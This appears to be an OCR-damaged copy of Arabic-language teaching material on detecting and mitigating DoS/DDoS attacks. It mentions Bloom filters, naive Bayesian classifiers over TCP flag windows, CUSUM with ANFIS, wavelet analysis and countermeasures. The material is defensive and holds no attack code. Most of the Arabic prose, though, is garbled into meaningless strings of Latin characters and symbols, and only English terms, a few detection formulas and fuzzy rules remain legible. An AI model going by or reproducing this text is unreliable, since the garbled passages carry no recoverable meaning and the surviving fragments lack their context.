Aiji^i ^j^jja jj^aUxll "compact representation" ^aJI JA<u3I jSjj lg_>l ^Vjl . cJjLS cjIj Bloom filters ^ 
13 (j^j c JjUui ^^>^- <^c- '^h^ .bit vector ^ i^JLuji lil ^jq"^ l!^^ u j^j 1 ° ^-^-a^ jj^Uxil (jl ^ 

<u!.ikU Bloom filters I j^j .bit vector ^ -^j^ jj jaall ej UUala ^ Bloom filters 

Bloom filters ^I^jLuAj IPv6 j^ , ^ j ^V1 <JL^. 6jll<Jl cJ^f^ *\\ (j^jja j > <al v> ^ j^. j jl j j s^liSj *ii witi 

^ j' (^) IP O'j^ ^ IPv6 o'j^ c> (ipac c^) "membership query" ^^Ui^^U 

-c>a j^iJI j^ll ^ Bloom filters <J^ta (array index) <S Jj^Ji j 'cA^^ IP u' -(^^) 

JP jljjc ^ hash function c> array indexes 

bit vector <jil£3l cjI jli^VI *^Uj c_jLud^ Bloom filters j j (j^^ 

jI^jVI Jaslxj (jiaik o^-aj .(collision) ^-^j V LoAic <c ^ (j>uia <jU jj^ajc Ai^iaj a j£ <lj Bloom filters ^Ij'^j 
^j^j <Jai ^ .^U^kiaiJI hash function j <^ >^ j-^UtJI 'Bloom filters j c> 
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aS%*1\ ^j^l ^IS Ripeanu et al. ^ g?^ "theoretical analysis" ls J* j^t^JI cm aS%*1\ 
^AxJ ( -Laal IaII Bloom filters ^ J^VI ^aJI jljlkl ^ ^cLoijj 4351511 jjjU-a3I £>i& jjj 4a5UJI ^ jJaill JjUMl 

A k\"\^A Aic\ Bloom filters c> ^U^l JJ^j ^ ^ t^SUJi d^a ,4jil£Jt jl^VI CjVa*^ j hash function c> 

.hash function 

"DDoS Detection" lhj^ £iUa* ^ O^JI 

4£^p. (JLojjU (jj-ajlj qA\ (j^j*^ a\\ (jjqj> >>^ll (j-a ^-^c- (j-a S^lc ^cjllj I^jS l_j jc. j-g jjiiJl ^^O^ 6 ^ > jl^-aJ) 

4^^pJ (JLojjVI j ^ L^a J^C ^ S^U j ^a^l U^J JJ^>^ ^^P" f ? a L>^ 5"HL$ A ^ 1 ^ JJJ - *^ 

(jC L_Lu£3l <J£jaUi Igil (^Sc £^L^J (jl ^UlU (j^-GJ dAjl > ^>J^1/(JJJ I— ll J j^. J ^ 4jJ±k]j A^JjaJl -laLuU ^-^j <J£jaUi .£>i& jj^Ji 

.6^^ IP (jjjUc 

(jc j lj>laaSl ^ 4_loujj3I a U^M DMM ^ o^J^Jl IP ^jj^Uc J jj^aj Jaslxj ^ 4i^lLJl 1>Aj jll o^A ^1 ikl^i ^jj 

a^I ^illj "sliding-window-based non-parametric" CUSUM ft^^J ^ t j^ill c> .Ain^JI JaUij 
cJui^i ^> Cj^UaJI ikl ja DMM ddos "Ahmed, E. 9 G.Mohay, A. Tickle, and S. Bhatia" 

ls^ j ^ c> IP ojjU^ ^> iJ& jxjIU ^ j£i ipac Bloom filters .(ipac) IP 

.?j=h^ {change detection algorithm) ddos 




Attack Traffic (fudp) 




Sw 



tch 




Victim 




Normal Traffic (tcpreplay) 



Dos Detection Using Na v ive Bayesian Classifiers 

t \*$\ \ ^ ^UJI ^caUaIIj machine-learning <> qVi^* ^1 ^1 m l JaxJI ^ j±&1\ ^ i"e>jp^\ <j jVI ^ 

."intrusion attacks" lS^^^ cjL^a ^j-q 4jx_ujI j <ja >i 4^^JI ( cj! diiL ^ t^JLacVI £>i& ^ ,4_xi^iJI ( cj! ^jc 
dijj£jajVl CjUl^a t "root escalation" ^1^1^ VI > ^ ^ Laj t^u^jajjll jjljlkV! djUL^c j^j J j^- ^Aj^*^ ^ 'c^^^j 
^a^JI j& Ji^^ cjU^a (j-<uia (Jjjj^ CjUl^a t *a (jy^ia (jc L_jlc. Ui Ullc. ^ill ^^joujjII J^UJI .tdli Uij ^''scripts attacks" 

jSlj tCjliljlkVI c> < <ni^H ^^Luj jl ^1 " computationally intensive models" AiSSJI a^L^JI ^iUull ^ ^ 
^jlxjj A T jL^ jj^ ANNs impractical j hidden Markov models (HMMs) J*^ ^ J**]! 

L_L^J uaA CA (jc c kjai£]l ,^bjia IjSj jl l^a. iku ^iLoill .^gjjLaJI dlS jll ^ J^J^ (j^ <■ ajuj^Slj J>»VI 

.til^LujVI <CJjoj ^Clj l^iaC- ^ (jj^J (jl 
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^DARPA t — KDD ^—^^ ^ t j tAjjojUall CjIjUJI (j-G o^-* ^ ^^ic bUuel aaIxj (Jjjj^ cj ^UlL^. 

. JLadl CjIa^A JjKM A^z^i* ( ^Jfc j 4-L^3LiaH J jjall J^C L&J^J tiilli j . Jjl^Ml j ^jWl (jla^iJ 

c Liai (I) aJUII (j^ajl > sv^W J^ljJJ <jl tdjUL-^iill DDoS cilli ^3 Laj dlL^Jfc <jc t ^^IaC ^aUaj (j-G L_fl^JI 

."line speeds" JaaJt <cjjuj ^ L_jji3U JjxjuHII <LIS (^-) j t^ixjll 4_iL*jlII CjUjt > ^11 ^ 4 L£i a (l_j) 6 ujj^ 

t> entropy values ^ ^ chi-square-test ^U^VI g^dl cf- c_LS£ll cjU^II ^ ,*bVlj Sjl^ll cjI jaJIj 
< "multivariate correlation analysis" JaliijVI jlSl j&U and Yeung" <*^j .f J^t l>*jjj 
lP 3 ^ "covariance matrix" aAjL^ UlS ^Jjjj .SYN cjUl^a ^j^a l_L^13 VH« 'o-j^ c> 

fjzA] j^*^l ( V»l^iuit CUSUM algorithm .^j^ cJ^» c> ^£^1 L >ajL^k ^ ^-jj J£ ^ aS5UJI 

,^ j^^ll (^-^ t — ^^>*-^ ^^-^ j^l ^^-^ 
.1^1 ^1^1 ^\ jjSI ^ "machine learning" c^VI j "pattern analysis" c> <-£ j^VI cjUiill 

c> ( hidden semi-Markov models ^l^aa^lj application layer DDoS J^-t ^ Xie et al. < JUJ! 

'genetic algorithms 'support vector machines c5j^l ( V 1 ' ^ ^^hOj'j^ ti^^ ^ ^ .CjU^JI ^> ^IjjVI 
^ j^Vl ^ Hybrid modelling techniques .Bayesian learningj artificial neural networks (ANN) 

tjLoull cAJ£ j^j "Bayesian classifiers" ^-bl j^VI ^jj^l cjUi^JI ^l^kl^l 41^1 JU&Vl CiJ^U j .^liall cjUII j DDoS 

;^JU3| j^jll Ci5 icj u^a CjL<l^A (Jxujjj ^_5^lj t^tc cJ£juoj 

^I^L.U a£j^3I ^ ^ixJI ^ ^j^llj saj^JI IP cjjjU^ ^> Ij^lS Xu, X. ? Y. Sun, and Z. Huang - 

.Cooperative Reinforcement Learning techniques cjU^j ^l^kl^U ^ j^JI ^ jjJI jjj CjU jkJI J^lii 
^1^3 traffic rate analyzer (TRA) s eo? j -? c. Lee, T. Shon, K.H. Cho, and J. Moon. - 

tgili tt^Si AiLjaVUj .ajKII TCP f 4 jmiL Sjlikxlt flag ? j^Ji u^b^ ^ill j TCP flag 
^ jaJI JL^j <jjau3U aII J j£ jj jjJl ^ <jjaii3 (jjjULi ^ilt j "protocol rate" Jj^j^ jj^^ J^*-* l>>n 

4_LaiLoJ <j£juj c _ 5 ic ^ J^-jl (*3^J ^^^^ C5"^ ^ l^jj tlLLuj lA ^aJ U£ JJ>Jl CLjIjjoJlSI AjL-aj ^aJJ L— jll 

.Ja^ll l^lj c ^ J\ bULu.1 DrDoS uUa J DDoS 'DoS ^W^i j .SVMs t> 

"Detection Approach" <-LiSll 

.Modelling UDP Traffic ^ CPA NSP ^ 'DMM ajjU^ Jib >V! Ul^II ^ 

^j^il CjUjSj^I ^ ^ixj ^j3Ij "signature-based detection techniques" ySj^l ^^11 cA^ll CjUii ^^ki^i Umj 

^Ju^ cjUii ijiii Ji^j J^l t> "streams" ^'j^ ^ J^-^ ^ £^ .(Traffic separation) 

.destination port 'destination ip ^ji^JI ^> jjjjI JjS ^ jldl jj^jj ^ .^j^JI 3JU 

cjUU£ ^ p»tii ^1 j ajjj^ cjUi cj^aJI jj^JI a£ Windowing .(Windowing) 
<»>J! ialjj ji "time windows" M uj^ ^ "window" "logical entities" 

Sjki^ <jJ l^jlj c^tiil ^Jl djSj JJii J^l ^> "packet windows" ialjj jLj^I ^ "packet windows" 

^ Sjjj^b tSiUill ialjjll ^> aLA^ qa iiJaj ^ ^j^Jl^ iLill Flagging .(Flagging an attack) 

^l^ij L_Jj^J! 4 i£ aA ^.l^xJli tAJllld 4_ix_n]a jjc. ial (Jjaa^ AjL-aj Asu ^ j^-jl *L<»!>lc '(J^^^ C-l^f^ c^^- 
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<Jj3 (J-g J-gjlII b& (j-G <J jis«-xi ^ Jl (j-J (JjfLiuJ L_fl^Jl ,5 cs - ^ UJ^ ^ J^^ll JJ^ Jali^ll (j^^A 3 c (j-a 

ial jit ^ jl£ blj 4 j^3l jjL^ J c£j ^\ J .step-based mechanism i4K&A\ 
Jla (>^aj liAj li* ^Ic-Vl ^ '(abnormal window count (AWC) a*** ^ JjW^ 

Modelling TCP Traffic 

^ic SJ^la (JJ^J (jl V*" C5"^ d iLaLlx jLl^.1 ^IjJ ^iUl j}Aj .(J jHj^>^l U^JJJ C5^j ^""^ ^^-^ ^ 6 (* g II (jC- < fljuJ^I] 

ciiajll ^ .c_budjVI TCP flags 'header J ^-*1*-JI i alik^ ^ jjj ^ j^JI j c^UI Ja^jlt jjj (Jjj^I 

.1 fljj&ll ^UaJ Jc J-<LaJl I^A j djLAcJl i>i& Ait (jiaik Jc ialiaJ) J) SjLiVI ^^J^ tCjLalx-Jl jLn^l Aj3 ^aJJ ^ill 

<> SjWc TCP flags TCP header J Wi. 'TCP flags <> TCP jjj* 

cJjfuj Jc-- TCP J *^'^ * ciile.! flags l - j ^- c - * jl ^pjail fl&g ^ .S-^-l j flag ^ <J^ '^—^ 8 ^- c * * 
RST <URG 'FIN 'PSH 'ACK 'SYN TCP flags j ^UUj ^IL , JL-31 . JL-31 »Li3l . JIUI 

JJ>a ]l U IjjU "seldom used packets" 'flags 6* o^l >lj .CWR 'ECWj (^Jyti TCP flags) 

s ."packet window" ^ j^JI siSU lS^ ^ i^^i j£\ flags c> >^ i> <^ <> "packet window" 
flags 6 ^ ls^ 0 .^iflUlt J^b dilaa jl c _^j3I a alia flags ^—^-c- Aj^jill CjUjl^VI ^Jaj a m ^ ^j^. siaU 

V ^3 flagS A-i*Jjll (JL^VI JJJ-^I ^J^- ^J^-^^) * ; JJ* 1 ^1 J^l (J^-b t^ajull l^jJa*J (^ic Axusu 

.LdLdJ AlflJjabd (j^^j (jl o^^^jj j - * 
^ flagS (>i ia^a JJa ^ j^j t*Ui JJ^Ij .Ajt-nlali ^ 1^ Aijai^ Jj^j TCP JJ>* 4t ^^ 

^jiasu cJ-<^ jj^ixJl j^ill ^^ic dj|Aa.Vl 2 ^ t° JJJ - ^^ ^J^- ^-^^ VI > <o ^ kxJ b& j .6^jl jll JJJ-^I ^J^- 

(J jistxJl £a^j3! 13 l^j] CjUUill dilc a t fllla o ^^^ic L-JjL^J Aau .Cj|^.VI (JliJ L_fl jjoj ^^jllj £LA2* - ^11 ^a^jII (JI^joiI 

;^U3I jaJll ^ Jj^j ^lj tflagS 

1. Tl: Packets with RST bit set (irrespective of other bits) - 32 packet types 

2. T2: SYN packets - 1 packet type 

3. T3: ACK packets - 1 packet type 

4. T4: FIN/ACK packets - 1 packet type 

5. T5: PSH/ACK packets - 1 packet type 

6. T6: Rest of the packets - 28 packet types. Includes seldom used packets and invalid packets 

fc*j "6*(iV+l)" ^VUil JU)f! ^AxJI JUi^l Jx^j ;U^»j cr^ 1 ^VUll c> (iV+1) ^ ^ ^=^1 ^ ^>JI SiaUl 
6 jjuLJI TCP jjj^^ ^j^- ^-jVUJI ^ j^ill aj^IjJI jj>^I ^j^- tl^ ^ Jl c> 4ila to^l j£i U£ j ttilli 

jUlkV Ufuj jajj liA j t jjjJI a^j^. gi <jal£ jj^i jl CjI^VI c> Jal ^AsJ t^Ulbj .TCP flags J I^I.^^hI ^ij^ c> 
^ cjI^I Jl ^^jj ^a dj^J jl Jxu^j V ^ll CjVU jla tt*Ui .4 Vij .. iil t cjU^I jjaVI ^ Naive Bayesian classifiers 
Mia .l^l^kiojl ^ji^j Laplacian smoothing ^ Kj mi j ^u^i < jL^a JUi^VI cjb djI^VI 1 1 ri>M . j^JI JL^I 

.cAiUJ! ^j-<i S jjt > ^ l1jLl<^ ^ J-^l (j^alj^ial UI^j <j| j I^ijuj V tdj^l^Jl (j-<i Jc <kaJaj Aic <La^ jjc. ^cjUs laxj ^a b^ 

^A^aaj ^jIj band lS^ 'K bands ^I^jLuAj t^Ui j <c j-^^ J£3 <Lu^JI (N+l) ^— >I^VI -^c ^pajiaaj ^ jij ^jaJ 

.(jjdjl^jll Uiajl ^jjud^jj ji^a JLdl^VI djb cjI^VI ^ b^j .1*^ JjUuJI JUu^VI djb cjI^VI 
jj^aJI ^> il^Sfl 4ij3u» .l^jla^iU ^ ^1 "bands" ^Uaj ^ TCP flags ^VU > liA ^> ui^il 

^Lxuj j dUJl JLu^l jA j cc-xuAU! JjVI ^21 I j^l j Jil CjVUI^VI j it^Sfl c> &^l ^ j-4^aJ| Jj bUluul 

,Aj3Lula jjP S^aU 4JI Jp 43 ja La ( IaI^j 



4-uIa ^^Lua 



Modelling UDP Traffic 



UDP header 'TCP 'ls^-j -tO^ JL^t yr^Wj '"connection-less" l£i JL^jI c^li <j| j&j UDP J s 

Jl ^ u 1 * '"connection-less" l$ JU^j! CjIj UDP cP> u' . J^VI ^^l^ ^1 j <flags Jj^ ^ i^j V 

V ttillil 4^jn j 4aA2aII ^JjjJ! (jUaill ^jl igViuiV 5J jta-o <UDP ft.V^"^ ^ jSj 4^aJt L-laj* L_)UiaJfe fk*A q\ 

.UDP ^ jij Jit <-<i^kJI L-i^ai dLoaj* <jc c ^Isla£ UDP header <^A* j^*-* ^l^kjjual <j£-<n 

siaU j ^ ^U>J! siaU <> WAT >JI siaUl window arrival time (WAT) y> ^kJI jta ^JUlLj 

t^UlSkxll J jjall I j]aj j .SiaUll jfc N ^IT* ^ialill PNj PI f U£ Cnajll J Jjill jA -Uli 44_iii3l 4_ia.U3l .^U jaJt 

6 jLaajVl 4la.j^ <j!>la. WAT ^1^1 L^bt-iLoaV j-^j jjjlaj j tial jill WATs ,4-lkt.iLa ial j^Jl ^>f^s 

Igil Sialill t fljl^aj ^Ija 6<j jjoixJI JLuaJ (j-<» <Jal <JLua.VI lilj jll Sialill J ^-aj J al^ \ ij laal ^-i diVl ~ iklLujj 

^ JJ£ ^ djI^Vl oi* JlSa^l tSSUA j^jj ^311 j ^t-nlaH ^ 4jU13 <Lla cjI^VI 'TCP Jj^ J^j 

.dja jll ^ j^a. Ia^^j ^5^1 1 j bands ^—^^ W^ATs ( . lllalj j j-^i ci^ J-ab^ ^ djVl^ia.Vl 

siaU J£ j tSiflU J£J W^AT ^jj <a y*^\ .band ^jjW^ ^ ^ ^jW 0 ^ band lS^ u!^ 'c^^^j 

^jjj .AjxjfSa jjc. siflUll jUjc-I ^ jjouJI JUua.1 ^>»-^al JUiia.VI I^a ^jl£ til .4 Wi W^AT l5^-^ band lJ^^I 

Dos Detection Using CUSUM and Adaptive Neuro-Fuzzy Inference System 

a ^1 ^^xi) iaaV jjj-^^ ^^j^*^ X(n) j^*^^ CUSUM jj^ c5jj^ I^a Ua^j 

L* Ullc. ^jSl j ^ j^ju^ll 4^ji3l (JjjLojI (Jc) l^a. "cumulative sum" C5^^J^^ ^1 ^> Lo^jc jli^VI ^jj 

^J) ^uii ^Uiill V^j t^l^ikU fuzzy inference system (FIS) .i^lSlI ^1 jliiVI <> ^AxJI g22 
.1 <jil£3l cjI jlijVI c> ^ j C3*jjkll jjij J > iVl JjJj 4iV "threshold value" <i ^ j^all 

CjUIx^ jink! ^11 ^ J^aal ^Ij^-V .W^^j ^jllkJI membership function ^ FIS z)j=A 

membership function 'ANFIS ^ .o^^ ^ ANFIS s^-iJnJi membership function 

-C5 ljiaJl dia jll AliJ ^fl l^jufta ^jll CjULuII C5 lc f-Lb ^Ijj La C5 lc (jj^J FIS 
a j^lc j /oiUall Jaxill (jc c fltrt^ll J^lk ^ tilli j ja^Jt ^jc c ^Liajjl jIoj! ^LojI ^^Sc l^iil^aJ (j^J DoS/DDoS ^^^^ diLili 

^jkj ^ij tc^ill aJI iaxn ^ .Trainedj Standard ic^^UI c*!jLJl CjIL^I^ ^> ^1 Uj^3 ijUJI ^ t_LiSll ^ tciUi 

t ftjuj^ ^aUaj (^ic AJldVI (J^H Snort <jila LliUjLajl Vj 6<! j^oij Igic c ftJ^H ^jj Aijj*-xJ! CjLaa^Jl ttilli ^jjaajJl 

.s^j^aJI CjlAa^JI c_jLuaaJ S- 1 ^ "signature databases" j^^ ^ 1 ja jla tdjLoj jj^ll 

.^S jlftlt ^aUail! pbl jl aj^IxJI Aja^llj^ Jid ^^IxJI ^alkill ^3 jLuJ JAdj I^jJ iLil! A jLuJI ^ c q^<^ c±iAj\ ^\ L-iJLuiVl 

^jiial "Mirkovic et al." uj^)^^j (j^ 3 j^j^ .SiLjJl CjVlaJI < aJaSl] ^-iUull ^ l^jj^ cJ^^ L^ljjli-o ^Uaill 4_1aIj1I <!LaJI 
Jiwlj lJ^S1\ lJ^j jlgi Ja. .(DDoS Network Attack Recognition and Defense) D_WARD 

jl! J <!Ui C _^A .^aalg-xJ! CliVjla^i <^a.l j>» J lA^L^a (JJ^J ^jJa. J 4£jJa3l L^jjJaS AjujjoJI ^laJLujVl Jc j^la (jj^J D W^ARD 

.AjilS ^jUj Jaxj (jUa.Vl uj^W^ t^j .autonomous mode 

c^£3! UJU J&lis aggregate congestion control (ACC) Ujjal "Mahajan et al" ujj^j u^^^ 

ls\ ( ; v?*^"^ C5^^ ^f^Jl Jc ^jjiiiiJaxJI ^ <c a£jJo3 4_iLaj3l ^LiiJI jA XenoServices cjliaiill Jc jjajiill 

^aja^il ^jxjj ^ill ^i^ul £cjjj Uu» ^XenoService ^-jl^i^ luj ^jJj jUaj jjoij ^^xJI jl jaL ^ajij ^Jlj 
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CjlL^al ^11 ^,^hin c ^j3I dAJVI . trained jstandard ^ ji^l cjc t ciiLill Jj^aa 1 t^lsJI ^ jLA\ djlL^al j-g C5 Ic ^Uj 
cjIL^I ja ^jja jj 4(Jll<JI <J-ijjuo ^^ic jlll <Lc j ^ * jl Jj£ jjj^>j (j^asu ^^ic Axusu ^juiiall til jLoill "standard" a J' ^ 
CjIL^I jJI ^ fatiwyi ^ c> L-LiSll aJI .TCP Jl^-ajl l^jjjjj jl yi^j ^1 Ajj^IjI! AaiL^li TCP J jjjjj 

<J j£ jj j^>Jl (jjJ.^-a jjjjilil t ; nil miVI (J^asu ^J^J j , jUaHVI (j-a I^-Lq ^alaoll j 4_a« L_L^ill TCP dVU^I (jc t Qui^N 

j^jjjjj ^^Luj ^ill SYN flood CjU^I t foviti <SYN cache j SYN cookies "protocol stack" 
l_uxJI til jIjoj Ja jjj^j o' ( . 1 >J c^J^ jjj*^ '^j^- ^W-?^ 5^ ^ standard jW* - *^ .TCP 

UJ^ C5^"^J ' JJ^^ ^^)^ A-j*-iilaH ^jjIx-aII 4_fiL<ui ^Uall jAjj ^^^illj dlLaa*g_ll (jj-^jJ QJ^^ ^ UJ^T^ (£ ^ 

"threshold values" ^Jl ^ f^Jt 5^ c>j ^ j ^ >^ ^ trained j^*-^^ ^ ^lun ^1 CjUIVI 

XP (jl jjc -l^j (J^^A 3 (jc- 1 ftju^ll ^1 ^J^^ .UJ^^^J -SYN ( ail ^ - V laall 4_a.j ^^ic L_Lai^ll AJI ^j^l .UJ^>^^J 

CJ^ ( -ujj^'j j^ 3 -P2P ( ^ ^ space similarityj CUSUM J^- ^ jjSI . jjj^Ij j^j . ja^II 

li* J* t> f^^' .Cumulative Sum-based Intrusion Prevention System (CSIPS) Jlji^VI ^ ^Uij 
j^j '"threshold" ^ ^ j^ju^I ^aJI j&j tiljl^ a^-Ij ( ; up tilU^ o^j ^-^^ ^^Icl jj^IaII (JaslII 

<JI aj^l^ ^ JB3 ^UJ| threshold ^31111 CjUjUjVI c> j^ll c^jj u ^^^ threshold ^ ^ 

J^Vl ANFIS ^-J^J^ ^a^klalj 1 la g J ^ 4C_DjuJ| li^l .C-fl.u£ll 



5-4iaJl (jU jaJl CjUaJfc CP ^ CUSUM f t^lwt AJl 

.CPA NSP 2^ .UjLuj Igij^aj U£ DMM ^JjlASt-o Ja.b j^Vl Ja*J jj^a ^xJl c-aj^ill 

4£ ^ cbi^i .a] ^U3! ANFIS J\ 4fc j ^ ^ Jil CUSUM u-U- ANFIS j CUSUM ^ c J 1 ^ 1 ^ ! ^ 
^bJl ^ jll gJUll J£ai3l C; Paxj .ANFIS ^1 j^j uj^ C 3 T J^^ t^j^ c^l ^.y^ (5 ill JJJ^ll 

^ ja^-ll Aa.AAil *L<»j^Ul (j^ajU^aJlj t^ajj^Jl dia jll JJJ-<JI ^^>^- ^ 6 C5^^^ cJ^^I ^ jjLaI! ^-i J-^ll 

. Jjli-ll ANFIS J\ h& ^ ^? W >3-» f% CUSUM fkXJb 
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c> non-parametric U jikl simple parametric description ^l^i^U ^ j^VI s^JI j ajI^Uj^I 

fl lilj ^Ui. UL^aJ Cilia. jl ^1 <LuUl li! dynamically ci^ 15 CUSUM 4^0 J > .CUSUM <^Jjl > 
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nth *J-^ (S^- j^i^ r» j^s-^ C5 ic J^j <Jf(/f) j^^-^ .^ii ( ; u^'^'^j Ia^jc j^ii^Jl cj^. ^jII a lailll 

■J!l(#I) C> oA^lalJl 4 ^ill j t\^(#f) W ^ILJI (jljjVl J 

XICMP(n)j XUDP(n) XSMURF(n) <XLAND(n) <XSYN(n) J\ £- <X(ff ) *J 

Jl 1^ j ^ < j&\ <ICMP Flood uUa j UDP Flood <Smurf 'Land <SYN Flood ^1 j 
.Ua 4^i3l 4^1L» ^Uj ^\ j£\ "variables" ^ j^lt ^ ^ .attack characteristic variables 

^ ^ jj JS1 JjULJI X(n) j^-il ^5 jLoj ^jII aJLjUU CUSUM ^ A^jSaSI 4f<ti\\ ^ ^ .<L^aU3l 

a tilLiA (jj^j LdAic S^u^ ^ AlLua (jli . ^ ^ a ^ g H 
I^JUll j^jll ^^ic 6jj£aa3I 4 alia A\ cAj^j* ^jjia^JI <^.aaL ^ jij 
SYN flood attack where we are taking into consideration the counts of RST, SYN and SYN/ACK packets: 

Land attack where N[(SRC_iP=DST_ip)&(SYNset)] represents the number of incoming packets having the same 
source IP address and destination IP address with its SYN FLAG set: 

XlAND(.tt) = ^[(SRCJP = DSTJP)&{SYNset)] 

Smurf attack where N (DEST_addr=baddr) denotes the number of ICMP requests made to the broadcast 
address, exploits the vulnerability in the ICMP protocol: 

% SMURF (h) = N(DEST-ADDR = BADDR) 

UDP flooding attack where N (DEST_addr=host_ip) denotes the number of incoming UDP packets, 

N (SRC_addr=host_ip) denotes the number of outgoing UDP Packets and NiCMP_error denotes the number of 

ICMP Destination Port Unreachable Error packets: 

Xunp(ft) = ( OEST-A DDR = H OST-f P) ~~ N(SRC _ADI>R=IfOST _I i*)) 

ICMP flood attack: 

X/cmpOO = Total payioad size of the 
ICMP request packets 

c> (4j jij* 1 f% 'attack characteristic variables ^j^^ ^ 

.ANFIS C5^» 

ANFIS Engines 



Aij^ Cjla^ikVlj "vagueness" o^j^^ cJ^ ^ ^jj^Jl J&> ^Lu>3 neural networksj Fuzzy logic 
^j-Q !>l£ l^j^ 3 Cf 0 Neuro-fuzzy djLuaj jjjiaj ^ .^LaLiJI ^liJl <JI <jHo Qim^l ^UlUj tS^liS cJ^j cIjIaIslaII 
t* ANFIS ."ANFIS" ^V-j Fuzzy Inference System (FIS)j Artificial Neural Network (ANN) 

c> CUSUM o- "threshold" ^ JJ s^-ll jlisvi M «l j] J ^ Vji .^j^> s> jaj, CUSUM **OJ> 
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membership function parameters ^->L>kJ <fuzzy logic-based mechanism ^ aJVI J^Lk 

.neural network *u&&\ ^ ^l^i^U FIS ^ ^jL£ J&\ 
^^jj iSac J£ ^ "five-layer feed-forward network" c^LLla ^jai^k ^UYI <^ g-& (adaptive network) 
fuzzy membership parameters ^->L^ <> a^^^ ^Lba sjjjll cjI jUVI ^ (node function) -Ma** 

.£>!>lc.l t - 1 uj3 jj c ^j3I CjUl^JI jjl ^ ^ jj jljc. Us.il ^jJI ^cl j£3l c ^Jj Lua ,S^«JI j^Luj 
RULE 1: If (X (n) is HIGH) then attack is HIGH 
RULE 2: If (X (n) is MEDIUM) then attack is MEDIUM 
RULE 3: If (X (n) is LOW) then attack is LOW 




layer 4 

\ 





X(n) 
1 


*i 






I * 





layer 5 




Fig, 5.10 Feed- forward networks 



Decision-Making 



■ ^ ANFIS J£l (defuzzified Ml) 'CUSUM oyli* £- ANFIS ^ISj^ ^ ^ 



^^ic J^J La-a tA-Jlc jl <iajoj jla jl 4 iJaikla ^tgill J^J^ C5 6 ^ CS"^ ^^-^ .defUZZified (JjjLojI ^^ic jljsll il^jl J 

"LOW .(JjllxJl ANFIS W^J^ ^ J^j l> ^^>S U^3 f .U^aj ^jll jlaU^aJl jlui* 

"MEDIUM <^ j^'" jjj^I £y jLLlJI jlaui 

_ jjJak a j^Jfc I^A JjSj > o jl£ iij La ^^>su V -UV iLkjl (j^aJ jl£ lij La I^Stla JjfL V JjjjoixJI 6<!UJl oi^ ^ 

iUJL a jflj j^jSI ^ <J jjjui.aJl jl^VI ftj^f '"HIGH ^^" jiaLkJl ^ jlo^a .^Laj^Ul a^Lia-a J^l^all iUJV jjIj ^ j 



'Wavelet-Based Signal Analysis" ^Lajj^i) ^ cjtjLiVt 



global " cf-^^^ ^ j j^j^ .^^^ ^ c> cj! jL^VI " Wavelet analysis" ( 
^ill c^jll ^j^j J^JI ^ Jx^j liA bC >I ^jjIIj c^jll CjUj^JI jSjj .no time localization j "frequency 
"time-localized anomalous signals" SiLi^! dia jll S jL^j ^ J£ ^ jlaJ J^JI S jLij . jj*^ jj3 CjL jLa <ua 

"time-localized signals" ^ jLij Jj^aii CjLauj-aJI t^j^JI jjj* a£ j^. ^jc c J^l .<^Lkll ^ ^.LjajjJallj 

.^11 Jia djLa^A j tflash events <<£f^l ^ J^a jl ^!^Y! 
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Wavelet analysis describes 
an i n p ut s ign a I in term s of 
spectral components 



Analyzing each spectra I 
window's energy determines 
the presence of anomalies 





Wavelets provide for 
/ concurrent time and 
frequency description 



They determine the time 
at which certain 
frequency components 
are present 




(DoS/DDoS Countermeasure) o-jJ AJa SjLaJI jaljsll 10.8 



IQM jJ / ^LaiaJl ( j^ CjIa^A A<ua <a11a]| jLuxoil CjL^jjI jIuiVI £y* 3^ 

(Absorb the attack) f j**^ o*UoZa\ ± 

"Degrade services" js»*JI cjU^aJI ^p. JjU^t J_ 
critical " <*^J' : ^^^J <JSVl ^ b> 1] Igili ^j^JI J!>U> Jaxj cibU^k J^liaJI ji^JI jjc. jl£ tit 

<L^)ia3l ^IfLajli ^aJ J - aJj t^Jailtj ;4£jjuJt ^aJj^^J aJ ^aJ .4-luib.nVt CjL»,liJt ^^Jc L_fl^)*j3t Vjt ^l^aJ tl^J ."service 

^ j^gJt cJ-^ ^] .^j^^ djUi^iJI j Jaliai] til^cLaaj ti&j . "noiicritical services" jjc. cjLd^kll ^ ia^Jl 

"Shut down services" ^U^aJ) jptet J_ 



)DoS Attack Count 



ountermeasures lhj 



t~\\\\ t ^ ^jjuj ;^jjjLujVI ^ / a I^ILuiaSI dibLja^Jl (J^ jj^-?^ S^J^aJl DDoS L>^ ^'^^ J^J^ 3 ^ UJ^J^ ^ 

;DDoS uUa ^ 

."Protect secondary targets" ^jjl^Jt uitJASfl - 

."Neutralize handlers" O^J^ I J^! - 

."Prevent potential attacks" cjU^SI - 

."Deflect attacks" ^U^fSt - 

."Mitigate attacks" cjL^) Oiiu - 

."Post-attack forensics" ?j^SI ^ c^^l ^ - 



https://www.facebook.com/tibea2004 
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M DoS/DDoS Countermeasures: Protect Secondary victims" bU*iIl 4jU* 

"Individual Users" <toO^ L ^Vun^ t J_ 

Cj£L& L_JUaxJl £>A& .Ai^ljUl Aj J ^^ixajj ^ Aji gaJ <jl (JA - f - *^ JtllLj <DDoS (J* U^ 0 -^ ^ U£L^~^ UL^jJall 4^1-^ (j^J 

UL^jJall <jL^al (j^J AjjjIjII UL^jJall 4_xJaj| Jjljiki Jc (jjj^ta jjc. (jj^lg-xJl <jl£ lij .AjIS jll djUjaj iklujl j tJxaVl jll 
V j ^frlaiaj) Jc agent el) - * ^3 L>^ ^> (jUu^al ^aJJ ^j) ^irTn ^j'q^lll m j.A±utA i^LULi \a\ Aj&\ja ^^IaslSI Jc t . la>J 6<jjojAj 

J AcLuiJ AjA^-g i>A& Jc ialiaJl j Sj| jjia A «s al ^ a j CjLoj JJ^I ******* .A^joJI Jj jj <Jj£ jll JJJ - ^ ^^>^ J^jj ^ 

4Hg.il j^lAllI £>A& JJ^» ^ Ai^jUl c axjJall Jal jx 4j*JUJ CjU^jJI "patches" CjUaau^aJ t . u£ jj caUj£ j OAj^all life 

J^ Aa. <Jlli (jl (j^J lAfc .Alm^JI ,j| j^Vl AJa 4_jU^JI j5 jj ^djLia *j;^j a j£J>.VI) ^-f u: A tlaJft (JA ^juiLuil £ '"^.''^ 
.(Jjjj.J dll (jj^ilajj ^a j^A aSlIj! ^£Ja! UJ-^3 ^— S jjuj g <i]i _4_}jjll!l A aiajVi Jjl jl^l 

"Network Service Providers" cjUa* ^aI* 4- 

jjjjjljll UUuJall jl ciii-kj ^j^j ^l^kluj^U "dynamic pricing" J^Uj^I <J] * 4£f*2JI J jjju^ j <-*AaJt ^aLJ 

